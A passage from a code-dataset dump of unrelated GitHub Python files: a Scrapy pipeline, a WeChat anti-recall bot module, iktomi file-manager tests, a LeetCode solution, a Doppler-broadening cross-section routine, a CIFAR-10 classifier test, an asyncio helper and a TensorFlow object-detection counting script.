self.mongo_base = client.leroymerlin\n\n def process_item(self, item, spider):\n item = process_item_props(item)\n collection = self.mongo_base[spider.name]\n collection.update_one({'link': item['link']}, {'$set': item}, upsert=True)\n return item\n\nclass LeroymerlinPhoptosPipeline(ImagesPipeline):\n def get_media_requests(self, item, info):\n if item['photos']:\n for img in item['photos']:\n try:\n yield scrapy.Request(img)\n except Exception as e:\n print(e)\n\n def item_completed(self, results, item, info):\n if results:\n item['photos'] = [itm[1] for itm in results if itm[0]]\n return item\n\ndef process_item_props(item):\n len_defs = len(item['props_definition'])\n item['props'] = {}\n for i, term in enumerate(item['props_term']):\n if i < len_defs:\n item['props'][term] = item['props_definition'][i]\n else:\n item['props'][term] = \"-\"\n\n item.pop('props_term')\n item.pop('props_definition')\n\n return item","repo_name":"anastasia-kucherova/geekbrains_data_mining","sub_path":"lesson7/leroymerlin/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24594296662","text":"#! /usr/local/bin/python3\n# -*- coding: utf-8 -*-\nimport re, time, os\nfrom servers.vendor.itchat.content import *\nfrom servers.vendor.itchat import send\nfrom servers.vendor.itchat import search_friends\n\nfrom servers.utils.wechatLog import *\nfrom servers.utils.wechatRecord import *\n\n\nclass Revoke():\n timeout = 130.0 #设置最长消息保留时间, 超时将被清理\n msg = None #当前收到消息\n revokeFlag = [u'\\u64a4\\u56de\\u4e86\\u4e00\\u6761\\u6d88\\u606f', 'recalled a message'] #撤回了一条消息\n msgLibrayDic = {} #所有消息记录\n\n def saveMessage(self, msg, userConfig):\n self.msg = msg\n userName = userConfig[\"userName\"]\n if msg['Type'] in [SYSTEM, NOTE]: return #不保存此类消息\n if msg['ToUserName'] == userName: #如果消息接受者是自己\n recordUserConfig({\"recMsgCount\" : 1}, \"count\") #接受消息数加一\n elif msg[\"FromUserName\"] == userName: #如果发送消息是自己\n recordUserConfig({\"sendMsgCount\" : 1}, \"count\") #发送消息数加一\n return #不保存自己发送的消息\n msgId = msg['MsgId']\n msgFromUserId = msg['FromUserName']\n msgFromNick = search_friends(userName=msgFromUserId)['NickName']\n msgCreateTime = msg['CreateTime']\n msgCreateTime_t = self.timeTodate(msgCreateTime)\n\n if msg['Type'] in [PICTURE, RECORDING, ATTACHMENT, VIDEO]:\n if not os.path.exists(RECEIVEFILES): os.makedirs(RECEIVEFILES)\n msgContent = RECEIVEFILES + msg.fileName\n msg.download(msgContent)\n elif msg['Type'] in [SHARING]:\n msgContent = msg['Text'] + '\\t' + msg['Url']\n elif msg['Type'] in [MAP]:\n x, y, location = re.search(\"\" + str(x) + \" 经度->\" + str(y) + \" \" + location\n msgContent = location\n elif msg['Type'] in [CARD]:\n msgContent = msg['RecommendInfo']['NickName'] + u' 的名片'\n else:\n msgContent = msg['Text']\n\n self.msgLibrayDic.update({\n msgId: {\n \"msgFromUserId\" : msgFromUserId,\n \"msgFromNick\" : msgFromNick,\n \"msgCreateTime\" : msgCreateTime, \n \"msgCreateTime_t\" : msgCreateTime_t, \n \"msgType\" : msg['Type'],\n \"msgContent\" : msgContent}\n })\n self.clearTimeoutMsg()\n\n def isRevokeType(self):\n if self.msg['Type'] != 'Note': return False\n ret = 0\n for i in self.revokeFlag:\n ret += self.msg['Content'].find(i)\n if ret == -2: return False\n return True\n\n def response(self, toUserName=None):\n if not self.isRevokeType(): return\n msgId = re.search(r'\\(.+?)\\<\\/msgid\\>', self.msg['Content']).group(1)\n msgRecorded = self.msgLibrayDic.get(msgId, None)\n if not msgRecorded: return\n explainInfo = u\"%s %s 撤回了一条%s消息\" % (msgRecorded[\"msgCreateTime_t\"], msgRecorded[\"msgFromNick\"], msgRecorded[\"msgType\"])\n toUserName = toUserName or msgRecorded['msgFromUserId']\n send(explainInfo, toUserName)\n if msgRecorded['msgType'] in [PICTURE, RECORDING, ATTACHMENT, VIDEO]:\n send('@%s@%s' % \n ('img' if msgRecorded['msgType'] == 'Picture' else 'fil', msgRecorded['msgContent']), \n toUserName\n )\n os.remove(msgRecorded['msgContent'])\n elif msgRecorded['msgType'] in [TEXT, MAP, CARD, SHARING]:\n send(msgRecorded['msgContent'], toUserName = toUserName or msgRecorded['msgFromUserId'])\n\n item = self.msgLibrayDic.pop(msgId)\n wechatLog.debug(u'already return: ' + item['msgContent'])\n self.clearTimeoutMsg()\n return None\n\n def clearTimeoutMsg(self):\n if not self.msgLibrayDic: return\n #字典在遍历的时候无法修改,RuntimeError: dictionary changed size during iteration\n for msgId in list(self.msgLibrayDic): \n if time.time() - self.msgLibrayDic[msgId]['msgCreateTime'] > self.timeout: #time out\n item = self.msgLibrayDic.pop(msgId)\n wechatLog.debug(u'time out msg: ' + item['msgContent'])\n if item['msgType'] in [PICTURE, RECORDING, ATTACHMENT, VIDEO]:\n wechatLog.debug(u'need to delete file: ' + item['msgContent'])\n os.remove(item['msgContent'])\n\n def timeTodate(self, timeStamp):\n timeObj = time.localtime(timeStamp)\n readTime = time.strftime(\"%Y-%m-%d %H:%M:%S\", timeObj)\n return readTime\n\n\n\nrevoke = Revoke()\n\n","repo_name":"aijialin/wechatManager","sub_path":"servers/vendor/banRevoke.py","file_name":"banRevoke.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"73262002642","text":"import unittest, os, tempfile, shutil\nfrom iktomi.db.files import TransientFile, PersistentFile, \\\n FileManager, ReadonlyFileManager\nfrom webob import Request\nfrom io import BytesIO\n\ntry:\n from unittest.mock import patch\nexcept ImportError:\n from mock import patch\n\n\nclass SqlaFilesTests(unittest.TestCase):\n\n def setUp(self):\n\n self.transient_root = tempfile.mkdtemp()\n self.persistent_root = tempfile.mkdtemp()\n self.transient_url = '/transient/'\n self.persistent_url = '/media/'\n\n self.file_manager = FileManager(self.transient_root,\n self.persistent_root,\n self.transient_url,\n self.persistent_url)\n\n self.ro_file_manager = ReadonlyFileManager(self.persistent_root,\n self.persistent_url)\n\n def tearDown(self):\n shutil.rmtree(self.transient_root)\n shutil.rmtree(self.persistent_root)\n\n\n def test_file_attrs(self):\n with open(os.path.join(self.transient_root, 'testfile.html'), 'w') as f:\n f.write('')\n\n fl = TransientFile(self.transient_root, 'testfile.html', self.file_manager)\n\n self.assertEqual(fl.mimetype, 'text/html')\n self.assertEqual(fl.size, 13)\n self.assertEqual(fl.file_name, 'testfile.html')\n self.assertEqual(fl.ext, '.html')\n self.assertEqual(fl.url, '/transient/testfile.html')\n\n def test_repr(self):\n with open(os.path.join(self.transient_root, 'testfile.html'), 'w') as f:\n f.write('')\n\n fl = TransientFile(self.transient_root, 'testfile.html', self.file_manager)\n represent = repr(fl)\n self.assertIn('TransientFile', represent)\n self.assertIn('testfile.html', represent)\n\n def test_no_file(self):\n fl = PersistentFile(self.persistent_root, 'testfile2.html', self.file_manager)\n\n self.assertEqual(fl.mimetype, 'text/html')\n self.assertEqual(fl.size, None)\n self.assertEqual(fl.file_name, 'testfile2.html')\n self.assertEqual(fl.ext, '.html')\n self.assertEqual(fl.url, '/media/testfile2.html')\n\n def test_delete(self):\n with open(os.path.join(self.transient_root, 'delfile1.html'), 'w') as f:\n f.write('')\n\n fl1 = TransientFile(self.transient_root, 'delfile1.html', self.file_manager)\n fl2 = TransientFile(self.transient_root, 'delfile2.html', self.file_manager)\n\n self.assertTrue(os.path.isfile(fl1.path))\n self.assertFalse(os.path.isfile(fl2.path))\n\n log = []\n with patch('logging.Logger.warning',\n side_effect=lambda m: log.append(m)):\n self.file_manager.delete(fl1)\n self.file_manager.delete(fl2)\n\n self.assertFalse(os.path.isfile(fl1.path))\n self.assertFalse(os.path.isfile(fl2.path))\n self.assertIn('delfile2.html', log[0])\n self.assertIn('was not found', log[0])\n\n def test_delete_error(self):\n path = os.path.join(self.transient_root, 'delfile1.html')\n with open(path, 'w') as f:\n f.write('')\n\n fl1 = TransientFile(self.transient_root, 'delfile1.html', self.file_manager)\n self.assertTrue(os.path.isfile(fl1.path))\n log = []\n\n # mocking permission error\n def unlink_error(path):\n raise OSError(\"[Errno 13] Permission denied: {}\".format(path))\n\n with patch('logging.Logger.error',\n side_effect=lambda m: log.append(m)):\n with patch('os.unlink', side_effect=unlink_error):\n with self.assertRaises(OSError) as exc:\n self.file_manager.delete(fl1)\n\n def test_readonly_file_manager(self):\n get_persistent = self.ro_file_manager.get_persistent\n\n fl = get_persistent('name.txt')\n self.assertIsInstance(fl, PersistentFile)\n self.assertEqual(self.ro_file_manager.get_persistent_url(fl), '/media/name.txt')\n\n\n self.assertRaises(ValueError, get_persistent, 'something/../name.txt')\n self.assertRaises(ValueError, get_persistent, '/something/name.txt')\n self.assertRaises(ValueError, get_persistent, '~/something/name.txt')\n\n\n def test_create_transient(self):\n req_fl = os.path.join(self.transient_root, 'xxxxx.html')\n with open(req_fl, 'w') as f:\n f.write('' * 10000)\n\n with open(req_fl) as f:\n request = Request.blank('/', POST={'file': ('big.html', f)})\n\n fl = self.file_manager.create_transient(request.POST['file'].file,\n request.POST['file'].name)\n\n self.assertEqual(fl.size, 130000)\n\n # XXX this is a test of strange behaviour when browser does not\n # pass Content-Length header when uploading a file in POST body\n # See iktomi.cms.ajax_file_upload\n # There is no obvious way to simulate this behaviour except\n # hardcoded length variable.\n with open(req_fl, 'w') as f:\n f.write('' * 10000)\n\n with open(req_fl) as f:\n request = Request.blank('/', POST={'file': ('big.html', f)})\n\n fl = self.file_manager.create_transient(request.POST['file'].file,\n request.POST['file'].name,\n length=130000)\n\n self.assertEqual(fl.size, 130000)\n\n def test_create_transient_dir(self):\n req_fl = os.path.join(self.transient_root, 'xxxxx.html')\n with open(req_fl, 'w') as f:\n f.write('' * 10000)\n\n nonexistent_dir = os.path.join(self.transient_root,\n \"non/existent/dir\")\n\n self.assertFalse(os.path.exists(nonexistent_dir))\n\n self.file_manager.transient_root = nonexistent_dir\n\n with open(req_fl) as f:\n request = Request.blank('/', POST={'file': ('big.html', f)})\n fl = self.file_manager.create_transient(request.POST['file'].file,\n request.POST['file'].name)\n\n self.assertEqual(fl.path, os.path.join(nonexistent_dir, fl.name))\n self.assertEqual(fl.size, 130000)\n\n def test_create_symlink(self):\n stream1 = BytesIO(b'hello')\n stream2 = BytesIO(b'world')\n\n source1 = self.file_manager.create_transient(stream1, 'hello.txt')\n source2 = self.file_manager.create_transient(stream2, 'world.txt')\n\n target_file_dir = os.path.join(self.persistent_root, 'dir/subdir')\n target_file = PersistentFile(target_file_dir, 'target.txt')\n target_file_path = os.path.join(target_file_dir, 'target.txt')\n self.assertFalse(os.path.isfile(target_file_path))\n\n self.file_manager.create_symlink(source1, target_file)\n\n self.assertTrue(os.path.isfile(target_file_path))\n\n with open(target_file_path) as f:\n self.assertEqual('hello', f.read())\n\n self.file_manager.create_symlink(source2, target_file)\n\n self.assertTrue(os.path.isfile(target_file_path))\n\n with open(target_file_path) as f:\n self.assertEqual('world', f.read())\n","repo_name":"SmartTeleMax/iktomi","sub_path":"tests/db/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":7373,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"3"} +{"seq_id":"74674902162","text":"class Solution:\n def minimizeResult(self, expression: str) -> str:\n low = float(\"inf\")\n result = \"\"\n left, right = expression.split(\"+\")\n for i in range(len(left)):\n for j in range(1, len(right) + 1):\n formula = left[:i] + \"*(\" + left[i:] + \"+\" + right[:j] + \")*\" + right[j:]\n current = eval(formula.strip(\"*\")) # no trailing/leading *\n if low > current:\n low = current\n result = formula.replace(\"*\", \"\") # judge wants without *\n\n return result\n","repo_name":"stbrumme/leetcode","sub_path":"2232.py","file_name":"2232.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"7828699499","text":"\"\"\" Final Project for NE806, Neutronics\n \n Author: Keith Huddleston\n Email: kdhuddle@ksu.edu\n \n Note, expect this file to run for awhile!\n Last Edit: Dec. 7, 2020\n\"\"\"\n\n# ============================================================================\n# Import statements\n# ============================================================================\nimport numpy as np\nfrom scipy.special import erf\n\n# Custom files written for project\nfrom Utilities.Utilities import Nuclide\n\n\n# ============================================================================\n# Create Text Files Containing the Doppler Broadened Cross Sections\n# ============================================================================\ndef Doppler(E2, E1, S1, T1, T2, M, m=1.009):\n \"\"\" Doppler Broadens \n\n Parameters\n ----------\n E2 : array_like\n New energy mesh at which to evaluate cross sections at.\n E1 : array_like\n Energy mesh of the reference cross section data.\n S1 : array_like\n Cross section data of reference.\n T1 : Float\n Temperature of the reference cross section data.\n T2 : Float\n New temperature at which to evaluate cross sections at.\n M : Float\n Atomic mass of target.\n m : Float\n Atomic mass of projectile, 1.009 for Neutron.\n Returns\n -------\n S2 : array_like\n Reavaluated cross section data for energies E2, and temperature T2\n\n \"\"\"\n Bk = 6.617*10**-5 # Boltzman Constant, [eV K^-1]\n alpha = (M/m)/(Bk*(T2-T1)) # Alpha term found in Doppler broadening Eqs.\n S2 = np.zeros(len(E2)) # Initialize new cross section data array\n S2_pos = np.zeros(len(E2))\n S2_neg = np.zeros(len(E2))\n \n F0 = lambda a: erf(a)\n H0 = lambda a, b: F0(a) - F0(b)\n \n F1 = lambda a: np.sqrt(1/np.pi) * (1-np.exp(-a**2))\n H1 = lambda a, b: F1(a) - F1(b)\n \n F2 = lambda a: (1/2)*erf(a) - (a/np.sqrt(np.pi))*np.exp(-a**2)\n H2 = lambda a, b: F2(a) - F2(b)\n \n F3 = lambda a: np.sqrt(1/np.pi) * (1-(1+a**2)*np.exp(-a**2))\n H3 = lambda a, b: F3(a) - F3(b)\n \n F4 = lambda a: (3/4)*erf(a) - np.sqrt(1/np.pi)*((3*a/2)+a**3)*np.exp(-a**2)\n H4 = lambda a, b: F4(a) - F4(b)\n \n def Af(E1, E2, S1, S2):\n den = (E2 - E1)\n num = (E2*S1) - (E1*S2)\n return num/den\n \n def Cf(E1, E2, S1, S2, alpha):\n den = (E2 - E1)*alpha\n num = (S2 - S1)\n return num/den\n \n # Evaluate Doppler-broadened cross section at specified energy E2[i]\n for i in range(len(E2)):\n S2i = 0\n y = [-1*np.sqrt(alpha*E2[i]), np.sqrt(alpha*E2[i])]\n for j in range(len(y)):\n Ek1 = E1[:-1]\n Ek2 = E1[1:]\n Sk1 = S1[:-1]\n Sk2 = S1[1:] \n xk1 = np.sqrt(alpha*Ek1)\n xk2 = np.sqrt(alpha*Ek2)\n\n Ak = Af(Ek1, Ek2, Sk1, Sk2)\n Ck = Cf(Ek1, Ek2, Sk1, Sk2, alpha)\n\n Zk1 = xk1 - y[j]\n Zk2 = xk2 - y[j]\n\n H0k = H0(Zk2, Zk1)\n H1k = H1(Zk2, Zk1)\n H2k = H2(Zk2, Zk1)\n H3k = H3(Zk2, Zk1)\n H4k = H4(Zk2, Zk1)\n\n S2i = H4k * (Ck) \\\n + H3k * (4*Ck*y[j]) \\\n + H2k * (Ak+6*Ck*y[j]**2) \\\n + H1k * (2*Ak*y[j]+4*Ck*y[j]**3) \\\n + H0k * (Ak*y[j]**2+Ck*y[j]**4)\n S2i = sum(S2i)\n if j == 0:\n S2_neg[i] = S2i/2/y[j]**2\n else:\n S2_pos[i] = S2i/2/y[j]**2\n S2 = S2_pos - S2_neg\n return S2\n\ndef Make_Doppler_Data(Nuclide, Temp, Energy=None):\n print('='*79 + '\\nDoppler Broadening ' + Nuclide.N + ' Data' + '\\n' + \\\n '='*79 + '\\n')\n data_type = ['ES', 'Total', 'Fission']\n for i in Temp:\n print('Broadening Data for Temperature ' + str(i) + \\\n '[\\N{DEGREE SIGN}K]...\\n')\n NEM = [0, 0, 0]\n NXS = [0, 0, 0]\n for j in range(3):\n if Nuclide.B[j]:\n E1 = Nuclide.e[300][j]\n XS = Nuclide.s[300][j]\n NXS[j] = Doppler(E1, E1, XS, 300, i, Nuclide.M)\n NEM[j] = E1\n \n Nuclide.e[i] = NEM\n Nuclide.s[i] = NXS\n \n print('Saving Broadened Data to .txt files\\n')\n for j in range(3):\n data = np.vstack(np.transpose([NEM[j], NXS[j]]))\n if Nuclide.B[j]:\n file_name = 'Data/Doppler/' + Nuclide.N + '_' + \\\n data_type[j] + '_' + str(i) + '.txt'\n np.savetxt(file_name, data, delimiter=',')\n print('Finished Broadening ' + Nuclide.N + ' Data\\n')\n \n# ============================================================================\n# Load and Doppler-Broaden Data\n# ============================================================================\n# Note, the data we are performing Doppler Broadening on are the interpreted\n# plot data from the BNL website, which are at 300 K. \nif __name__ == \"__main__\":\n # Temperature values to Doppler-Broaden to\n Temps = [600, 900, 1200]\n \n # Define the objects for containing data for H1, O16, U_235, U_238 \n H1 = Nuclide('H1', 1, 1.008, [1, 1, 0])\n O16 = Nuclide('O16', 16, 15.995, [1, 1, 0])\n U235 = Nuclide('U235', 235, 235.044, [1, 1, 1])\n U238 = Nuclide('U238', 238, 238.051, [1, 1, 1])\n \n # Doppler-Broaden Data\n Make_Doppler_Data(H1, Temps)\n Make_Doppler_Data(O16, Temps)\n Make_Doppler_Data(U235, Temps)\n Make_Doppler_Data(U238, Temps)\n\n","repo_name":"keithhuddleston/NE806","sub_path":"Homework/Project/Doppler_Data.py","file_name":"Doppler_Data.py","file_ext":"py","file_size_in_byte":5537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7385476436","text":"import os\nimport argparse\nimport torch\nimport yaml\n\nfrom torch.utils.data.dataloader import DataLoader\n\nfrom torchvision.transforms import transforms\nfrom torchvision.datasets import CIFAR10\n\nfrom classifier.tester import Tester\n\ndef argparser():\n args = argparse.ArgumentParser()\n\n args.add_argument('--model_name', type=str, help='File name of the model to be used during testing', required=True)\n args.add_argument('--device', type=str, default='cuda:0', choices=['cuda:0', 'cpu'], help='Specify the device on which executes the training.', required=False)\n args.add_argument('--config', type=str, default='./config/classifier/alexnet_cGAN_epoch100.yaml', help='Path to the configuration file.', required=False)\n\n return args.parse_args()\n\ndef get_config(config: str):\n \"\"\"\n Load the configuration file.\n\n Parameters\n ----------\n config : str\n Path of the configuration file.\n\n Returns\n -------\n The yaml configuration file parsed.\n \"\"\"\n\n with open(config, 'r') as f:\n return yaml.load(f, Loader=yaml.FullLoader)\n\n\ndef main(args):\n config = get_config(args.config)\n\n # Resize is fine both for alexnet and resnet\n transformList = transforms.Compose([transforms.Resize(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))])\n\n cifar10_testset = CIFAR10(root=config['dataset_path'],\n train=False,\n transform=transformList,\n download=True)\n\n cifar10_testloader = DataLoader(dataset=cifar10_testset,\n batch_size=config['batch_size'],\n shuffle=False,\n num_workers=config['num_workers'])\n\n device = torch.device(args.device if torch.cuda.is_available() else \"cpu\")\n print(f\"Code will be executed on {device}\")\n\n tester = Tester(test_loader=cifar10_testloader,\n device=device,\n args=args,\n config=config)\n\n tester.test()\n\nif __name__ == \"__main__\":\n # To suppress tensorflow warnings\n os.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\"\n\n args = argparser()\n main(args)","repo_name":"fdaddeo/Data-Augmentation-with-cGANs","sub_path":"test_classifier.py","file_name":"test_classifier.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"25731195569","text":"import asyncio\nfrom functools import partial\nfrom functools import wraps\n\nimport nest_asyncio\nimport uvloop\nfrom more_itertools import divide\nfrom more_itertools import flatten\nfrom tqdm import tqdm\n\n# setup\n\nnest_asyncio.apply()\nuvloop.install()\n\n\ndef with_index(fxn):\n @wraps(fxn)\n def wrapped(i, *args, **kwargs):\n return (i, fxn(*args, **kwargs))\n\n return wrapped\n\n\nasync def exec_async_fxn(\n fxn, arg_list, kwargs, chunk_size=1, desc=\"\", progress_bar=True\n):\n \"\"\"Executes an asynchronous function.\n\n :param fxn: function to execute in parallel\n :type fxn: callable\n :param arg_list: list of arguments as tuples for each function run\n :type arg_list: list of tuples\n :param kwargs: key-value arguments for each function run\n :type kwargs: dict\n :param chunk_size: number of functions to run for each worker\n :type chunk_size: int\n :param desc: description\n :type desc: basestring\n :param progress_bar: whether to display tqdm progress bar\n :type progress_bar: boolean\n :return: list of results in same order as arg_list\n :rtype: list\n \"\"\"\n # run asynchronously\n\n loop = asyncio.get_event_loop()\n partial_fxn = partial(with_index(fxn), **kwargs)\n futures = [\n loop.run_in_executor(None, partial_fxn, i, *args)\n for i, args in enumerate(arg_list)\n ]\n\n # collect results\n results = []\n\n iterator = asyncio.as_completed(futures)\n if progress_bar:\n iterator = tqdm(iterator, desc=desc, total=len(futures), unit_scale=chunk_size)\n\n for f in iterator:\n results.append(await f)\n results = sorted(results, key=lambda x: x[0])\n return [r[1] for r in results]\n\n\ndef asyncfunc(fxn, arg_list, kwargs=None, chunk_size=1, progress_bar=True, desc=None):\n \"\"\"Runs a function asynchronously.\n\n :param fxn: function to run asynchronously\n :type fxn: function or lambda\n :param arg_chunks: arguments to apply to the function; suggested to divide list\n into chunks\n :type arg_chunks: list\n :return: result\n :rtype: list\n \"\"\"\n if kwargs is None:\n kwargs = {}\n # finish loop\n loop = asyncio.get_event_loop()\n if desc is None:\n desc = desc\n results = loop.run_until_complete(\n exec_async_fxn(\n fxn,\n arg_list,\n kwargs=kwargs,\n desc=desc,\n progress_bar=progress_bar,\n chunk_size=chunk_size,\n )\n )\n # loop.close()\n return results\n\n\ndef make_async(\n chunk_size, progress_bar=True, as_classmethod=False, data_pos=0, return_type=list\n):\n \"\"\"Wrapper to make a function run asynchrounously.\n\n :param chunk_size: size of array to apply to each worker\n :type chunk_size: int\n :param progress_bar: whether to display a progress bar\n :type progress_bar: bool\n :param as_classmethod: whether to pass in the first argument as a instance for\n instance or classmethods\n :type as_classmethod: bool\n :param data_pos: position in arguments where list of data is\n :type data_pos: int\n :return: results\n :rtype: list\n \"\"\"\n\n def dec(fxn):\n data_position = data_pos\n if as_classmethod:\n data_position += 1\n\n @wraps(fxn)\n def wrapper(*args, **kwargs):\n data = args[data_position]\n post_data_args = args[data_position + 1 :]\n pre_data_args = args[:data_position]\n chunks = divide(chunk_size, data)\n arg_list = [pre_data_args + (c,) + post_data_args for c in chunks]\n desc = 'Running \"{}\" [size: {}, num: {}]: '.format(\n fxn.__name__, chunk_size, len(chunks)\n )\n results = asyncfunc(\n fxn, arg_list, kwargs=kwargs, progress_bar=progress_bar, desc=desc\n )\n if all([r is None for r in results]):\n return None\n try:\n iter_results = flatten(results)\n except TypeError:\n iter_results = results\n if return_type:\n return return_type(iter_results)\n return results\n\n return wrapper\n\n return dec\n","repo_name":"jvrana/Terrarium","sub_path":"terrarium/utils/async_wrapper.py","file_name":"async_wrapper.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"3"} +{"seq_id":"37267559156","text":"import matplotlib\n# Force matplotlib to not use any Xwindows backend.\nmatplotlib.use('Agg')\nimport numpy as np\nimport os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\nimport collections\n\nfrom collections import defaultdict\nfrom io import StringIO\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\n\nimport datetime\n\n# This is needed to display the images.\n#%matplotlib inline\n\n# This is needed since the notebook is stored in the object_detection folder.\nsys.path.append(\"..\")\n\nfrom utils import label_map_util\n\nfrom utils import visualization_utils as vis_util\n\n# What model to download.\n#MODEL_NAME = 'ssd_mobilenet_v1_coco_11_06_2017'\nMODEL_NAME = '.\\\\mo'\nMODEL_FILE = MODEL_NAME + '.tar.gz'\nDOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/'\n\n# Path to frozen detection graph. This is the actual model that is used for the object detection.\nPATH_TO_CKPT = MODEL_NAME + '\\\\frozen_inference_graph.pb'\n\n# List of the strings that is used to add correct label for each box.\nPATH_TO_LABELS = os.path.join('data', '6675_label_map.pbtxt')\n\nNUM_CLASSES = 12\n\n#opener = urllib.request.URLopener()\n#opener.retrieve(DOWNLOAD_BASE + MODEL_FILE, MODEL_FILE)\n#tar_file = tarfile.open(MODEL_FILE)\n#tar_file = tarfile.open('./m/' + MODEL_FILE)\n#for file in tar_file.getmembers():\n# file_name = os.path.basename(file.name)\n# if 'frozen_inference_graph.pb' in file_name:\n# tar_file.extract(file, os.getcwd())\n\nstarttime = datetime.datetime.now()\n\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\ncategory_index = label_map_util.create_category_index(categories)\n\ndef load_image_into_numpy_array(image):\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\ndef find_on_image_array(image,\n boxes,\n classes,\n scores,\n category_index,\n instance_masks=None,\n keypoints=None,\n use_normalized_coordinates=False,\n max_boxes_to_draw=20,\n min_score_thresh=.5,\n agnostic_mode=False,\n line_thickness=4,\n target_classes = [1]):\n \"\"\"Overlay labeled boxes on an image with formatted scores and label names.\n\n This function groups boxes that correspond to the same location\n and creates a display string for each detection and overlays these\n on the image. Note that this function modifies the image array in-place\n and does not return anything.\n\n Args:\n image: uint8 numpy array with shape (img_height, img_width, 3)\n boxes: a numpy array of shape [N, 4]\n classes: a numpy array of shape [N]\n scores: a numpy array of shape [N] or None. If scores=None, then\n this function assumes that the boxes to be plotted are groundtruth\n boxes and plot all boxes as black with no classes or scores.\n category_index: a dict containing category dictionaries (each holding\n category index `id` and category name `name`) keyed by category indices.\n instance_masks: a numpy array of shape [N, image_height, image_width], can\n be None\n keypoints: a numpy array of shape [N, num_keypoints, 2], can\n be None\n use_normalized_coordinates: whether boxes is to be interpreted as\n normalized coordinates or not.\n max_boxes_to_draw: maximum number of boxes to visualize. If None, draw\n all boxes.\n min_score_thresh: minimum score threshold for a box to be visualized\n agnostic_mode: boolean (default: False) controlling whether to evaluate in\n class-agnostic mode or not. This mode will display scores but ignore\n classes.\n line_thickness: integer (default: 4) controlling line width of the boxes.\n \"\"\"\n # Create a display string (and color) for every box location, group any boxes\n # that correspond to the same location.\n box_to_display_str_map = collections.defaultdict(list)\n box_to_color_map = collections.defaultdict(str)\n box_to_instance_masks_map = {}\n box_to_keypoints_map = collections.defaultdict(list)\n result_map = {}\n for i in target_classes:\n result_map[i] = 0\n if not max_boxes_to_draw:\n max_boxes_to_draw = boxes.shape[0]\n for i in range(min(max_boxes_to_draw, boxes.shape[0])):\n if scores is None or scores[i] > min_score_thresh:\n box = tuple(boxes[i].tolist())\n if instance_masks is not None:\n box_to_instance_masks_map[box] = instance_masks[i]\n if keypoints is not None:\n box_to_keypoints_map[box].extend(keypoints[i])\n if scores is None:\n box_to_color_map[box] = 'black'\n else:\n if not agnostic_mode:\n #print (classes[i])\n if classes[i] in category_index.keys():\n if classes[i] in target_classes:\n result_map[classes[i]] = result_map[classes[i]] + 1;\n return result_map\n\n# For the sake of simplicity we will use only 2 images:\n# image1.jpg\n# image2.jpg\n# If you want to test the code with your images, just add path to the images to the TEST_IMAGE_PATHS.\nPATH_TO_TEST_IMAGES_DIR = 'C:\\\\Users\\\\gx\\\\Downloads\\\\images\\\\images\\\\painting'\nfilenames = os.listdir(PATH_TO_TEST_IMAGES_DIR)\nTEST_IMAGE_PATHS = [ os.path.join(PATH_TO_TEST_IMAGES_DIR, i) for i in filenames ]\n\n# Size, in inches, of the output images.\nIMAGE_SIZE = (12, 8)\n\nwith detection_graph.as_default():\n with tf.Session(graph=detection_graph) as sess:\n # Definite input and output Tensors for detection_graph\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n # Each box represents a part of the image where a particular object was detected.\n detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\n detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n target_classes = []\n for i in range(1, 13):\n target_classes.append(i)\n for i in range(21291, len(TEST_IMAGE_PATHS)):\n image_path = TEST_IMAGE_PATHS[i]\n #print(image_path)\n image = Image.open(image_path)\n # the array based representation of the image will be used later in order to prepare the\n # result image with boxes and labels on it.\n image_np = load_image_into_numpy_array(image)\n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image_np, axis=0)\n # Actual detection.\n (boxes, scores, classes, num) = sess.run(\n [detection_boxes, detection_scores, detection_classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n # Visualization of the results of a detection.\n result = find_on_image_array(\n image_np,\n np.squeeze(boxes),\n np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n category_index,\n use_normalized_coordinates=True,\n line_thickness=8,\n target_classes=target_classes)\n line = str(os.path.basename(image_path))\n #print(result)\n for i in target_classes:\n line = line + \",\"\n line = line + str(result[i])\n print (line)","repo_name":"ShwanWu/CSE6242-Data-and-Visual-Analytics","sub_path":"Art 